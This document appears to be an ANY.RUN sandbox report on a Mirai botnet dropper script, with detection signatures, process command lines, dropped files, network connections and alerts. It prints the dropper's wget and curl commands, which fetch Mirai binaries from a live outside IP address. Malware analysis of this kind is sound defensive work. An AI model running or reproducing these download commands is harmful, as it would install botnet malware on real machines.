File name: bash.sh

Full analysis: https://app.any.run/tasks/3799e4df-9756-48fc-8d51-e047747791ab
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: March 26, 2025, 09:23:00
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5: E9D282FE04078B2D45522FACFCE2DF0B
SHA1: 3CF77DFBBC7CF114515F94E5ECD0C38C3819FD83
SHA256: 8325AD7EBED7FDD287CC0CD89F81A51617A64B38D09FA3D84C9141477E0DD415
SSDEEP: 48:YelMe3aepoHekfeQG92eRU8HYLLNeGrHJe/8DelaDe9hSLo:YhNRH/xN7HJRJq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • GoldAge3ATOx64 (PID: 40970)
      • GoldAge3ATOx86 (PID: 41008)
  • SUSPICIOUS

    • Uses wget to download content

      • bash (PID: 40670)
    • Executes commands using command-line interpreter

      • sudo (PID: 40669)
    • Modifies file or directory owner

      • sudo (PID: 40666)
    • Reads passwd file

      • curl (PID: 40673)
      • gvfs-udisks2-volume-monitor (PID: 41173)
      • gdm-session-worker (PID: 41023)
      • gnome-shell (PID: 41132)
      • dumpe2fs (PID: 40695)
      • dumpe2fs (PID: 40707)
    • Connects to the server without a host name

      • curl (PID: 40673)
      • wget (PID: 40713)
      • wget (PID: 40744)
      • wget (PID: 40778)
      • wget (PID: 40811)
      • wget (PID: 40845)
      • wget (PID: 40875)
      • wget (PID: 40906)
      • wget (PID: 40939)
      • wget (PID: 40975)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 40670)
    • Potential Corporate Privacy Violation

      • wget (PID: 40713)
      • curl (PID: 40673)
      • wget (PID: 40744)
      • wget (PID: 40778)
      • wget (PID: 40811)
      • wget (PID: 40845)
      • wget (PID: 40906)
      • wget (PID: 40875)
      • wget (PID: 40939)
      • wget (PID: 40975)
    • Creates files in the user directory

      • bash (PID: 40670)
    • Reads network configuration

      • GoldAge3ATOx64 (PID: 40967)
      • GoldAge3ATOx64 (PID: 40970)
    • Gets active TCP connections

      • GoldAge3ATOx64 (PID: 40967)
      • GoldAge3ATOx64 (PID: 40970)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • gnome-shell (PID: 41132)
    • Modifies bash configuration script

      • bash (PID: 40670)
    • Contacting a server suspected of hosting a CnC

      • GoldAge3ATOx64 (PID: 40970)
      • GoldAge3ATOx86 (PID: 41008)
  • INFO

    • Checks timezone

      • wget (PID: 40713)
      • wget (PID: 40744)
      • wget (PID: 40778)
      • wget (PID: 40811)
      • wget (PID: 40845)
      • wget (PID: 40875)
      • wget (PID: 40906)
      • wget (PID: 40939)
      • wget (PID: 40975)
      • gdm-session-worker (PID: 41023)
      • gnome-shell (PID: 41132)
      • dumpe2fs (PID: 40695)
      • dumpe2fs (PID: 40707)
    • Creates file in the temporary folder

      • wget (PID: 40713)
      • curl (PID: 40673)
      • curl (PID: 40714)
      • curl (PID: 40745)
      • curl (PID: 40779)
      • curl (PID: 40812)
      • wget (PID: 40778)
      • wget (PID: 40845)
      • curl (PID: 40846)
      • curl (PID: 40876)
      • curl (PID: 40940)
      • wget (PID: 40906)
      • curl (PID: 40907)
      • wget (PID: 40975)
      • curl (PID: 40976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
All screenshots are available in the full report
Total processes
450
Monitored processes
228
Malicious processes
7
Suspicious processes
7

Behavior graph

Process tree (interactive graph in the full report): dash → sudo → chown, chmod and sudo → bash → locale-check, followed by one wget/curl download per payload, each followed by chmod, bash, rm and rm; the goldage3atox64 and goldage3atox86 nodes are flagged #MIRAI. The remaining nodes are the ordinary GNOME session start-up processes (gdm-session-worker, systemd, dbus-daemon, gnome-shell, gsd-*, ibus-*, gvfsd and so on).

Process information

PID: 40665
CMD: /bin/sh -c "sudo chown user /home/user/Desktop/bash\.sh && chmod +x /home/user/Desktop/bash\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/bash\.sh "
Path: /usr/bin/dash
Parent process: any-guest-agent
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40666
CMD: sudo chown user /home/user/Desktop/bash.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40667
CMD: chown user /home/user/Desktop/bash.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40668
CMD: chmod +x /home/user/Desktop/bash.sh
Path: /usr/bin/chmod
Parent process: dash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40669
CMD: sudo -iu user /home/user/Desktop/bash.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0

PID: 40670
CMD: /bin/bash /home/user/Desktop/bash.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40671
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40672
CMD: wget --quiet 141.98.10.122/GoldAge3ATOarm
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40673
CMD: /snap/curl/1754/bin/curl -s -O 141.98.10.122/GoldAge3ATOarm
Path: /snap/curl/1754/bin/curl
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0

PID: 40686
CMD: /snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info
Path: /snap/snapd/20290/usr/lib/snapd/snap-seccomp
Parent process: curl
User: user
Integrity Level: UNKNOWN
Exit code: 0

Executable files
0
Suspicious files
76
Text files
12
Unknown types
0

Dropped files

PID | Process | Filename | Type
40672 | wget | /tmp/GoldAge3ATOarm | binary
40713 | wget | /tmp/GoldAge3ATOarm6 | binary
40744 | wget | /tmp/GoldAge3ATOm68k | binary
40778 | wget | /tmp/GoldAge3ATOmips | binary
40811 | wget | /tmp/GoldAge3ATOmpsl | binary
40845 | wget | /tmp/GoldAge3ATOppc | binary
40875 | wget | /tmp/GoldAge3ATOsh4 | binary
40906 | wget | /tmp/GoldAge3ATOspc | binary
40939 | wget | /tmp/GoldAge3ATOx64 | binary
40975 | wget | /tmp/GoldAge3ATOx86 | binary
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
30
DNS requests
11
Threats
37

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
- | - | GET | - | 195.181.175.40:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | -
- | - | GET | 204 | 185.125.190.18:80 | http://connectivity-check.ubuntu.com/ | unknown | whitelisted
- | - | GET | 204 | 185.125.190.98:80 | http://connectivity-check.ubuntu.com/ | unknown | whitelisted
- | - | GET | 204 | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | unknown | whitelisted
40673 | curl | GET | 200 | 141.98.10.122:80 | http://141.98.10.122/GoldAge3ATOarm | unknown | unknown
- | - | GET | 200 | 141.98.10.122:80 | http://141.98.10.122/GoldAge3ATOm68k | unknown | unknown
40744 | wget | GET | 200 | 141.98.10.122:80 | http://141.98.10.122/GoldAge3ATOm68k | unknown | unknown
- | - | GET | 200 | 141.98.10.122:80 | http://141.98.10.122/GoldAge3ATOarm6 | unknown | unknown
- | - | GET | 200 | 141.98.10.122:80 | http://141.98.10.122/GoldAge3ATOarm | unknown | unknown
40713 | wget | GET | 200 | 141.98.10.122:80 | http://141.98.10.122/GoldAge3ATOarm6 | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 91.189.91.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
- | - | 185.125.190.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
- | - | 185.125.190.18:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
- | - | 212.102.56.179:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted
- | - | 224.0.0.251:5353 | - | - | - | unknown
- | - | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
- | - | 141.98.10.122:80 | - | UAB Host Baltic | LT | unknown
40673 | curl | 141.98.10.122:80 | - | UAB Host Baltic | LT | unknown
40713 | wget | 141.98.10.122:80 | - | UAB Host Baltic | LT | unknown
40744 | wget | 141.98.10.122:80 | - | UAB Host Baltic | LT | unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
whitelisted
odrs.gnome.org
whitelisted
api.snapcraft.io
whitelisted
google.com
  • 142.250.185.174
  • 2a00:1450:4001:806::200e
whitelisted
14.100.168.192.in-addr.arpa
unknown

Threats

PID | Process | Class | Message
- | - | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 21
- | - | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40673 | curl | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
40673 | curl | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40713 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
- | - | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
- | - | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
40744 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
- | - | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
- | - | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info